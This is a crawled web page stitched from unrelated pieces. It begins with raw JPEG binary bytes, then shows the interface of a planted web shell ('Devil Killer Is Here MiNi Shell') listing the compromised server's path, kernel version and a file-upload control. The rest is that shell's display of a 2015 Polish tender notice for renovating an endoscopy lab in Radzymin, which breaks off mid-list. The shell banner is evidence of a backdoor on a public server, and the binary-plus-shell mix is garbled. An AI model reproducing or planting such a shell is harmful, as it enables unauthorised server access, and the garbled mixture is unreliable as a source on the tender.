JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150602/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150602/131568-N-2015.html

<p class="kh_header"><b>Radzymin: Remont pomieszczeń budynku Przychodni na potrzeby utworzenia Pracowni Badań Endoskopowych w Centrum Medycznym im. Bitwy Warszawskiej 1920 r. w Radzyminie</b><br>
<b>Numer ogłoszenia: 131568 - 2015; data zamieszczenia: 02.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Medyczne im. Bitwy Warszawskiej 1920 r.w Radzyminie Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 22 7865037, faks 22 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cmradzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń budynku Przychodni na potrzeby utworzenia Pracowni Badań Endoskopowych w Centrum Medycznym im. Bitwy Warszawskiej 1920 r. w Radzyminie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z realizacją zadania inwestycyjnego pn. Remont pomieszczeń budynku Przychodni na potrzeby utworzenia Pracowni Badań Endoskopowych w Centrum Medyczne im. Bitwy Warszawskiej 1920 r. w Radzyminie.
Wymagania ogólne  wg obowiązujących przepisów .
Wszystkie rozwiązania architektoniczno budowlane muszą spełniać aktualne warunki techniczne jakim powinny odpowiadać budynki oraz ich usytuowanie w tym pomieszczenia z przeznaczeniami dla działalności leczniczej.
Wymagania szczegółowe
Ściany. 
Wewnętrzne ściany działowe  murowane z bloczków silikatowych, cegły, np. ściany działowe między pomieszczeniami.
Obudowy szachtów kominów  murowane z bloczków silikatowych, cegły lub z płyt GK na ruszcie stalowym.
Wykończenie ścian  gładź gipsowa  należy wykonać powierzchnie zmywalne odporne na uszkodzenia. Należy zastosować farbę której zastosowanie może być wykorzystane w placówkach leczniczych farby zmywalne  lateksowe wewnętrzna matowa  Greinplast FW L  Kolorystyka do uzgodnienia z Zamawiającym. 
Wykończenie ścian w łazience wc,  płytki ceramiczne  glazura z profilami ceramicznymi do wysokości sufitu. Układanie płytek do czoła bez listew wykończeniowych. 
 Podłogi i posadzki.
Wykończenie posadzek. 
W kabinie sanitarnej i wc,  Płytki gresowe, antypoślizgowe  z profilami ceramicznymi do połączeń posadzka ściana. Stosować płytki zgodne z klasyfikacją obciążenia ruchem P.E.I. Zastosować należy płytki gresowe o parametrach nasiąkliwości, ścieralności 
i odkształceń nie gorszych niż np. Tubądzin P Braid R.2.  
Pomieszczenie badań, poczekalni, zmywalni, brudownika i odpoczynku wykładzina TARKETT, homogeniczna, trudnozapalna, antystatyczna.
Ślusarka okienna.
Pomieszczenia wyposażone są w okna plastikowe w kolorze białym. Wymagana regulacja istniejących okien. Należy wymienić i zamontować parapety konglomeratu  rodzaj i kolorystyka do uzgodnienia z Zamawiającym. 
Wentylacja mechaniczna.
Przed przystąpieniem do prac  jednakże nie później niż 14 dni od dnia podpisania umowy Wykonawca ma zaproponować rozwiązania w zakresie zastosowania  wentylacji mechanicznej i usytuowania centralki sterującej. 
Ślusarka drzwiowa zewnętrzna.
Drzwi zewnętrzne plastikowe w kolorze białym z naświetleniem górnym.  Wymagana regulacja istniejących drzwi.
Stolarka wewnętrzna.
W pomieszczeniach budynku przychodni zamontowane są drzwi firmy PORTA. 
W celu zachowania jednolitego stolarki wewnętrznej dla całego budynku należy zamontować taki sam rodzaj oraz kolor drzwi, drzwi wewnętrzne białe. Drzwi wewnętrzne dla gabinetu badań endoskopowych w ilości 2 szt. muszą być dodatkowo wyciszone. Stolarkę drzwiową należy dostarczyć z klamkami wraz z szyldami i wkładkami patentowymi do zamków z kompletem 3 kluczy na jedne drzwi. 
Grzejniki.
W pomieszczeniach należ dobrać moc i zastosować grzejniki higieniczne odpowiadające wymogą sanitarnym w placówkach leczniczych.
pomieszczenie do badań  21,5 m2,
pomieszczenie odpoczynku  8,3 m2,
kabina higieniczna  3,9 m2  grzejnik drabinkowy
WC 2,4 m2 grzejnik drabinkowy
zmywalnia 7,3 m2 
poczekalnia 7,2 m2
Wysokość pomieszczeń  3 m
Instalacja teletechniczna oraz instalacja systemu zarządzania  energią.
W pomieszczeniach pracowni należy uwzględnić instalację teletechniczną, informatyczną oraz instalację systemu zarządzania energią o parametrach takich jak już istniejące w budynku.
Pozostałe.
Obudowy przewodów instalacyjnych z płyty gipsowo  kartonowej do zastosowań ściennych i sufitowych na ruszcie stalowym. Sufity podwieszane we wszystkich pomieszczeniach z płyt kasetonowych na konstrukcji metalowej  schemat konstrukcji rusztu stalowego zgodnie z instrukcją producenta typu ECOPHON GEDINA. E w pracowni endoskopowej PERFORMANCE A T24, biały 010, 600x600 mm. Uwaga ze względu na wysokość okien do sufitu należy przewidzieć właściwe rozwiązania konstrukcyjne dla montażu sufitów podwieszanych. W pomieszczeniach mokrych płyta odporna również na działanie wilgoci. 
Armatura: Zlewozmywaki ze stali nierdzewnej, umywalki, miski ustępowe, bidety, baterie łokciowe, montowane na ścianach, a w przypadku misek ustępowych 
i bidetów z wykorzystaniem stelażu podtynkowego systemu spłukiwania. Armatura zastosowana w pomieszczeniach pracowni nie może być gorsza niż np. KOŁO. System spłukiwania toalet  podtynkowy na stelażu ze sterowaniem od przodu. Użyte materiały muszą posiadać stosowne atesty, certyfikaty lub aprobaty techniczne.
Podane w wytycznych informacje nie powodują konieczności przeprowadzenia wizji lokalnej  w  pomieszczeniach, jednakże Zamawiający dopuszcza taką możliwość.
Wymagania dotyczące instalacji sanitarnych.
Wstęp.
Pomieszczenia pracowni powinien być wyposażony we wszystkie niezbędne instalacje pozwalające na użytkowanie obiektu zgodnie z przedmiotowym programem, przy zachowaniu standardów wykonania i jakości materiału. Wszystkie instalacje wewnętrzne oraz przyłącza wewnętrzne należy wykonać jako nowe. Instalacje powinny być wykonane jako kryte, chyba że przepisy określające warunki techniczne, jakim powinny odpowiadać obiekty budowlane, stanowią inaczej.
Lokalizacja wszelkich elementów instalacji sanitarnych wymagających obsługi w trakcie normalnej eksploatacji, a zabudowane ściankami lub sufitami muszą być oznakowane w sposób czytelny i jednoznaczny. Sposób zabudowy musi umożliwiać łatwy dostęp serwisowy. Elementy instalacji wpływających na bezpieczeństwo i jakość użytkowania pomieszczeń powinny być oznaczone dla użytkownika. 
Zapewnić ogrzewanie pomieszczeń z dostosowaniem typu i charakterystyki instalacji grzewczej do proponowanych źródeł ciepła uwzględniając działający w CM Radzymin system zarządzania energią. Dla pomieszczenia do badań endoskopowych należy zapewnić wentylację mechaniczną.  Wykonawca zaproponuje rozwiązanie w tym zakresie. 
W zakresie odprowadzenia ścieków należy wykonać nowe  instalacje  wewnętrzne w niezbędnym zakresie.
Zakres instalacji określić można jako:
wewnętrzne instalacje kanalizacji sanitarnej,
wewnętrzne instalacje wody zimnej i ciepłej na potrzeby technologiczne, sanitarne,   porządkowe.
wewnętrzne instalacje grzewcze.
wentylacyjne mechaniczną dla wybranych pomieszczeń z możliwością schładzania.
instalację wentylacji ogólnej bytowej zapewniającej wymagane prawem ilości powietrza świeżego dla osób przebywających w pomieszczeniach.
Przy wykonawstwie w zakresie instalacji sanitarnych należy uwzględnić następujące punkty
Instalacje należy wykonać zgodnie z obowiązującymi normami i przepisami.
Materiały powinny posiadać i urządzenia aktualne: aprobaty techniczne, atesty higieniczne PZH, certyfikaty m.in. bezpieczeństwa B, deklaracje zgodności.
Przepusty instalacyjne, tuleje ochronne, instalacje CO, CT , inst. wz, wc, cyrkulac., przewody inst. wentylacji i inne w ścianach oddzielenia p.pożarowego powinny mieć odporność ogniową równą odporności ogniowej tego oddzielenia, 
Instalacje powinny być wykonane w bruzdach, chyba że przepisy określające warunki techniczne jakim powinny odpowiadać obiekty budowlane.
W trakcie prac montażowych instalacji, urządzeń sanitarnych i przyborów należy zwrócić szczególną uwagę na prawidłowe mocowanie do stelaży, konstrukcji wsporczych, uchwyty, itp.
Przy zastosowaniu materiałów instalacyjnych, przyborach sanitarnych 
i urządzeniach muszą one spełniać wymogi jakościowe w zakresie stosowania ich w placówka leczniczych, określające jedynie oczekiwany standard jakościowy. 
Instalacja wody zimnej, ciepłej i cyrkulacji.
Woda zimna i ciepła przeznaczona jest na cele  bytowe, porządkowe, technologiczne. Podejścia do grup przyborów z rozprowadzeniem pod tynkiem lub w posadzkach. Ciepła woda przygotowywana centralnie dla całego budynku w kotłowni lokalnej na bazie kotłów gazowych. Instalacje wody ciepłej i cyrkulacji wykonać z rur tworzywowych.
Kanalizacja sanitarna.
Odprowadzenie ścieków sanitarnych do wewnętrznej sieci kanalizacji sanitarnej na terenie budynku. Instalację w całości zaprojektować i wykonać jako nową z rur i kształtek PVC,  stosowanie do wymogów i parametrów odprowadzanych ścieków w placówkach leczniczych. 
Instalacja C.O.
W pomieszczeniach należy wykonać układy centralnego ogrzewania na bazie istniejącego węzła cieplnego w budynku zasilanego z lokalnej kotłowni.
Instalacje wentylacyjne.
Przewidzieć należy w poszczególnych pomieszczeniach układ wentylacji ogólnej bytowej nawiewno wyciągowej. Wentylacja z organizacją dystrybucji powietrza zależnie od charakteru pomieszczenia  głównie nawiew i wyciąg górą za pomocą kratek wentylacyjnych kanałowych z przepustnicą. Wentylacja mechaniczna tylko dla pomieszczenia badań endoskopowych.
Wymagania dotyczące instalacji elektrycznych i teletechnicznych			
Wstęp.
Program funkcjonalny w zakresie szeroko pojętych instalacji elektrycznych dotyczy wymagań dla rozwiązań technologicznych i architektonicznych, a także dostosowania instalacji do aktualnych przepisów.
UWAGA
Wszystkie zastosowane materiały i urządzenia muszą posiadać świadectwa dopuszczenia do stosowania w budownictwie, posiadać wymagane prawem atesty i aprobaty oraz spełniać wymogi szczegółowych norm i przepisów z zakresu BHP, sanitarnych i p. pożarowych. Instalacje elektryczne należy wykonać w jak największym stopniu jako inteligentne, dostosowujące dostawy energii do poszczególnych pomieszczeń, urządzeń i instalacji. 
Wewnętrzne linie zasilające  WLZ  ty
Sposób prowadzenia WLZ zostanie określony podczas projektowania z szczególnym uwzględnieniem wymagań technicznych w remontowanych pomieszczeniach. Należy wykonać wewnętrzne linie zasilające WLZty dla obwodów oświetleniowych, komputerowych, technologicznych, bezpieczeństwa, awaryjnych, kontrolno pomiarowych i innych wymaganych dla prawidłowego działania pracowni endoskopowej. 
Oświetlenie podstawowe.
Oświetlenie podstawowe należy zrealizować za pomocą opraw jarzeniowych, żarowych oraz ze świetlówkami kompaktowymi lub innych wybranych przez Zamawiającego na etapie realizacji. Stosować oprawy nastropowe, modułowe np. do stropów podwieszonych, naścienne w zależności od charakteru pomieszczenia i jego zabudowy. Stosować oprawy o właściwym dla danego pomieszczenia stopniu szczelności przystosowane  min. dla gabinetów zabiegowych. Oprawy jarzeniowe powinny być wyposażone w statecznikami elektronicznymi energooszczędne. Natężenie oświetlenia dla poszczególnych pomieszczeń przyjąć zgodnie z normami i wymaganiami dla placówkach leczniczych w tym pracowni endoskopowych. 
Obwody gniazd wtyczkowych ogólnego przeznaczenia.
We wszystkich pomieszczeniach należy wykonać osobne obwody gniazd wtyczkowych ogólnego przeznaczenia dostosowując ilość gniazd i ich lokalizację do charakteru i zagospodarowania poszczególnych pomieszczeń oraz wymagań Zamawiającego. Poszczególne gniazda muszą być opisane w sposób umożliwiający jednoznaczną identyfikację obwodów we właściwych tablicach . Należy zamontować cztery gniazda w podłodze w pomieszczeniu badań endoskopowych.
Sieć dedykowana dla okablowania strukturalnego Kategoria 6A.
W pomieszczeniach należy wykonać wydzielone obwody zasilania gniazd wtyczkowych dedykowanych dla okablowania strukturalnego. Dla każdego stanowiska komputerowego należy przewidzieć zestaw minimum 3 gniazd DATA 230VAC i 3 gniazd zasilania ogólnego. Lokalizację stanowisk komputerowych należy nawiązać do zagospodarowania poszczególnych pomieszczeń.
Okablowanie strukturalne. 
Dla wszystkich pomieszczeń, zakłada się budowę jednolitego systemu okablowania strukturalnego umożliwiającego transmisję danych i głosu. Sieć okablowania strukturalnego w pomieszczeniach pracowni endoskopowej  musi zostać wykonana zgodnie ze parametrami i standardami okablowania strukturalnego już istniejącego w budynku  Kategoria 6A.
Instalacje systemu włamania i napadu. 
W pomieszczeniach pracowni należy zaprojektować i zainstalować systemy ochrony wewnętrznej zintegrowany z systemem już istniejącym w budynku. Przy doborze urządzeń alarmowych należy uwzględnić parametry techniczne stosowanych czujek oraz zminimalizować utrudnienia w codziennej pracy personelu. 
Sposób montażu oraz warunki stosowania urządzeń powinny uwzględniać zalecenia producenta. Miejsce montażu powinno zapewniać jak najmniejszą możliwość dostępu osób niepowołanych. Wszystkie urządzenia alarmowe powinny znajdować się w strefie chronionej, chyba że z zasady ich stosowania wynika inaczej. 
System PPOŻ.
W pomieszczeniach pracowni należy zaprojektować i zainstalować systemy ochrony p.poż zintegrowany z systemem już istniejącym w budynku System powinien być wpięty do już istniejącej centrali ppoż. Rodzaje czujek pożarowych należy dostosować do potrzeb wynikających z charakteru pomieszczeń i technologii w nich zawartej. 
Wszystkie parametry i rozwiązania techniczne muszą być dostosowane do już istniejących rozwiązań w budynku. 
WYMAGANIA DOTYCZĄCE WYKOŃCZENIA
Kolorystyka pomieszczeń po uzgodnieniu z Zamawiającym posadzki, ściany, stolarka wewnętrzna i wykładziny TARKETT.
Należy stosować materiały jednego systemu producenta, np. klej do płytek, masa do fugowania ,izolacje w płynie ,taśmy narożne, mankiety uszczelniające przy podejściach wodnych i kanalizacyjnych do przyborów sanitarnych, preparaty gruntujące. 
Zabrania się stosowania materiałów różnych producentów do danej czynności.
Wszystkie materiały przed wbudowaniem należy przedłożyć do akceptacji Inwestora atesty, dopuszczenia, oceny itp.
Wszystkie elementy wyposażenia wnętrz wbudowane i połączone na stałe 
z pomieszczeniami leżą w gestii Wykonawcy po wcześniejszym ustaleniu 
z Zamawiającym Inwestorem.
ODBIÓR ROBÓT
odbiór końcowy Państwowego Powiatowego Inspektora Sanitarnego wraz z wydaniem decyzji na użytkowanie dla Inwestora Zamawiającego będą realizowane przez Wykonawcę.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50% zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.40.00.00-1, 45.21.00.00-2, 45.31.00.00-3, 45.32.00.00-6, 45.33.00.00-9, 45.34.00.00-2, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6, 45.31.10.00-0, 45.31.40.00-1, 45.31.60.00-5, 45.31.70.00-2, 45.32.40.00-4, 45.33.10.00-6, 45.34.30.00-3, 45.42.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składając ofertę każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 3 000,00 zł Wadium wnosi się przed upływem terminu składania ofert. 1. Wadium można wnieść w : 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.). 2. Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek Zamawiającego : BANK PEKAO S.A. 70124060741111000049961744. Wadium wnoszone w innej formie niż pieniężna należy złożyć do siedziby Zamawiającego - Dział finansowy budynek przychodni II piętro pok. 222 do dnia otwarcia ofert do godziny składania ofert. Natomiast do oferty należy dołączyć kserokopię poświadczoną za zgodność z oryginałem.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem oceny spełniania w/w warunku Wykonawca złoży oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych - wzór załącznik nr 4.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem oceny spełniania w/w warunku Wykonawca złoży: wykaz robót budowlanych odpowiadających swoim rodzajem robotom będący przedmiotem zamówienia tj. związanych z wykonaniem : Remontu na min. 2 czynnych obiektach w tym jeden remont pomieszczeń z przeznaczeniem dla działalności medycznej o powierzchni min. 60 m2 każdy i o wartości min. 140 tys. brutto każda.
(Zakres robót budowlanych winien obejmować między innymi roboty ogólnobudowlane,  roboty branżowe w tym okablowania strukturalnego, systemu sygnalizacji pożaru, system napadu i włamania, instalacji wod- kan i c.o, wentylacji mechanicznej) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że te roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - wzór wykazu stanowi załącznik nr 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem oceny spełniania w/w warunku Wykonawca złoży oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych - wzór załącznik nr 4.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osobami zdolnymi do wykonania zamówienia  Celem oceny spełniania ww warunku Wykonawca złoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami tj: 
a) 	Kierownik budowy - koordynator wszelkich prac budowlanych powinien posiadać uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994r, Prawo Budowlane ( tj. Dz.U. z 2006r. Nr 156, poz. 1118 ) i doświadczenie zawodowe co najmniej 10 letnie, a funkcję kierownika budowy sprawować w ciągu ostatnich 5 lat, w tym na minimum dwóch obiektach służby zdrowia. - wzór wykazu stanowi załącznik nr 7</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem oceny spełniania w/w warunku Wykonawca złoży: Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie co najmniej 140 000,00 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
